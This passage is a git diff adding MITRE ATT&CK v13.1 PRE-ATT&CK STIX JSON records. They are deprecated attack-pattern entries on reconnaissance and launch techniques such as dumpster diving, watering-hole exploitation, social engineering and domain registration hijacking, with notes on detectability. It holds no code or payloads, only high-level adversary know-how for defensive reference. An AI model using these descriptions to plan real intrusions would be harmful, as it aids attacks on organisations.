For example, in [http://www.cisco.com Cisco] devices, the firmware version is easily determined once the device model and OS version is known since it is included in the release notes.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1035", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d.json new file mode 100644 index 0000000000000000000000000000000000000000..d7475e5381b26ecb4ef69b0f684196938500edce --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--cdaa30d6-f082-4c1c-88da-eaa536c2093e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6c79d654-6506-4f33-b48f-c80babdcc52d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dumpster dive", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).\n\nDumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1286", + "external_id": "T1286" + }, + { + "source_name": "FriedDumpsters", + "description": "Robert B. Fried. (n.d.). Dumpsters: Beware of Treasures. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Strong physical security and monitoring will detect this behavior if performed on premises.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Not difficult if waste is placed in an unsecured or minimally secured area before collection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1063", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b.json new file mode 100644 index 0000000000000000000000000000000000000000..eac62deed7dbfc906778a70fbc092700326bec05 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--af78eae8-7168-4701-aadc-d186c86d23f1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Host-based hiding techniques", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).\n\nHost based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1314", + "external_id": "T1314" + }, + { + "source_name": "VirutAP", + "description": "Microsoft Malware Protection Center. (2008, July 30). Virus: Win32/Virut.AP. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Techniques are difficult to detect and might occur in uncommon use-cases (e.g., patching, anti-malware, anti-exploitation software).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Some of the host-based hiding techniques require advanced knowledge combined with an understanding and awareness of the target's environment (e.g., exploiting weaknesses in file formats, parsers and detection capabilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1091", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148.json new file mode 100644 index 0000000000000000000000000000000000000000..0aaa67915c401762c1c76a9332959169cb20e0bf --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--67883864-f934-4b45-9386-08ac8af6aa1b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Push-notification client-side exploit", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1373", + "url": "https://attack.mitre.org/techniques/T1373" + }, + { + "description": "Joshua Drake. (2015, August 5). Stagefright: Scary Code in the Heart of Android. Retrieved March 29, 2017.", + "source_name": "BlackHat Stagefright" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). 
Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:22:23.446Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1150", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily executed technique to push an MMS-type message to the target which does not require interaction on the part of the target to be successful.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "For non-corporate cellular devices not joined to the corporate network, it is not possible to detect an adversary's use of the technique because messages traverse networks outside of the control of the employer. For corporate cellular devices which are joined to the corporate network, monitoring of messages and ability to patch against push attacks is possible, assuming they are fully monitored.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25.json new file mode 100644 index 0000000000000000000000000000000000000000..717772825149d0edf31edeb588a9fb8d37c4eb1c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--e5754c75-b088-4b87-aaab-be0c47124dbc", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user's computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1371", + "url": "https://attack.mitre.org/techniques/T1371" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + }, + { + "description": "Fahmida Y. Rashid. (2015, February 11). Chinese Attackers Hacked Forbes Website in Watering Hole Attack: Security Firms. Retrieved March 7, 2017.", + "source_name": "ForbesSecurityWeek" + }, + { + "description": "Kurt Baumgartner. (2016, October 3). On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users. 
Retrieved May 9, 2017.", + "source_name": "StrongPity-waterhole" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:52.970Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1148", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery. The additional challenge is the reduced set of options for web sites to compromise since the set is reduced to those often visited by targets of interest.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not foolproof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised. The added challenge for a conditional watering hole is the reduced scope and likely reduced ability to detect or be informed. Determining deltas in content (e.g., differences files type/size/number/hashes) downloaded could also aid in detection.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39.json new file mode 100644 index 0000000000000000000000000000000000000000..c03600feaf9cf9aa3549c1f6a1d7bd8b848e70fc 
--- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--0aa75c30-02f2-4f23-b314-357e5629a4ac", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1331", + "external_id": "T1331" + }, + { + "source_name": "FireEyeAPT17", + "description": "FireEye. (2015, May). APT17: Hiding in Plain Sight - FireEye and Microsoft Expose Obfuscation Tactic. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will generally not have visibility into their infrastructure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Building and testing infrastructure and obfuscating it to protect it against intrusions are a standard part of the adversary process in preparing to conduct an operation against a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1108", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1.json new file mode 100644 index 0000000000000000000000000000000000000000..2c7b21bedc3dae5257386ea2bba876528a23566a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--25669987-3397-49b6-9bdc-475c694d2007", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1249", + "external_id": "T1249" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting technical information about a target. 
Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1026", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--78e41091-d10d-4001-b202-89612892b6ff.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--78e41091-d10d-4001-b202-89612892b6ff.json new file mode 100644 index 0000000000000000000000000000000000000000..7783ea72876331a600a0e115414231cc363fc374 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--78e41091-d10d-4001-b202-89612892b6ff.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--f427c282-6b45-435e-8d24-6a73ae3393e0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify supply chains", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).\n\nSupply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1246", + "external_id": "T1246" + }, + { + "source_name": "SmithSupplyChain", + "description": "Drew Smith. (2015). Is your supply chain safe from cyberattacks?. Retrieved March 5, 2017." + }, + { + "source_name": "CERT-UKSupplyChain", + "description": "CERT-UK. (2016, October 01). Cyber-security risks in the supply chain. Retrieved March 5, 2017." + }, + { + "source_name": "RSA-supply-chain", + "description": "RSA Research. (2017, February). KINGSLAYER \u2013 A SUPPLY CHAIN ATTACK. Retrieved May 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, if not impossible to detect, because the adversary may collect this information from external sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Supply chain diversity of sourcing increases adversary difficulty with accurate mapping. Industry practice has moved towards agile sourcing.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1023", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f.json new file mode 100644 index 0000000000000000000000000000000000000000..6a584c06b5f704a72ac12da5786afafd429c8e64 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2da5a68c-2f3b-4758-aec2-49741669d6ab", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit public-facing application", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).**\n\nThe use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1377", + "url": "https://attack.mitre.org/techniques/T1377" + }, + { + "description": "PETER BRIGHT. (2013, November 6). Google crawler tricked into performing SQL injection attacks using decade-old technique. Retrieved March 9, 2017.", + "source_name": "GoogleCrawlerSQLInj" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:20:54.394Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1154", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Launching a SQL injection attack is not overly complex and a commonly used technique. 
This technique, however, requires finding a vulnerable application.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "If the application and network are designed well, the defender should be able to utilize logging and application logic to catch and deflect SQL injection attacks.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7.json new file mode 100644 index 0000000000000000000000000000000000000000..e20b87027f127e8b106689ccbb24ed2e8de5cdc5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--6abe7d87-aeb5-42b1-a5db-e4f0708eeef8", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate operational infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1318", + "external_id": "T1318" + }, + { + "source_name": "DellComfooMasters", + "description": "Joe Stewart and Don Jackson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence. (2013, July 31). Secrets of the Comfoo Masters. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect given a significant sample size, depending on how the unique identifier is used detection may be difficult as similar patterns may be employed elsewhere (e.g., content hosting providers, account reset URLs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily generate pseudo-random identifiers to associate with a specific target, include the indicator as part of a URL and then identify which target was successful.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1095", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a.json new file mode 100644 index 0000000000000000000000000000000000000000..20bda34c7c3f27344a85aa6f9aa797e05fd99f31 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--3b20184c-419d-4dec-950d-b1082e4f3a91", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain registration hijacking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1326).\n\nDomain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1326", + "external_id": "T1326" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1103", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires adversary to gain access to an email account for person listed as the domain registrar/POC. The adversary can then claim that they forgot their password in order to make changes to the domain registration. 
Other possibilities include social engineering a domain registration help desk to gain access to an account or take advantage of renewal process gaps.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Generally not easily detectable unless domain registrar provides alerting on any updates.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910.json new file mode 100644 index 0000000000000000000000000000000000000000..a0b3c1f73f483ed2172241026db263d5e90b2684 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--57a6a505-29db-408d-907d-b7e01da5bfb9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create implementation plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1232).\n\nImplementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1232", + "external_id": "T1232" + }, + { + "source_name": "ChinaCollectionPlan", + "description": "Thomas B Inglis. (1946, December 31). COLLECTION PLAN TO IMPLEMENT NATIONAL INTELLIGENCE REQUIREMENTS FOR CHINA. Retrieved March 2, 2017." + }, + { + "source_name": "OrderOfBattle", + "description": "Wikipedia contributors. (2016, November 20). Order of battle. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. 
May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1009", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8.json new file mode 100644 index 0000000000000000000000000000000000000000..fe3f332901d1e77441f01429dd7766e92aaada9d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--c27966d9-7c91-47ef-9a0a-4f503130242c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test ability to evade automated mobile application security analysis performed by app stores", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: 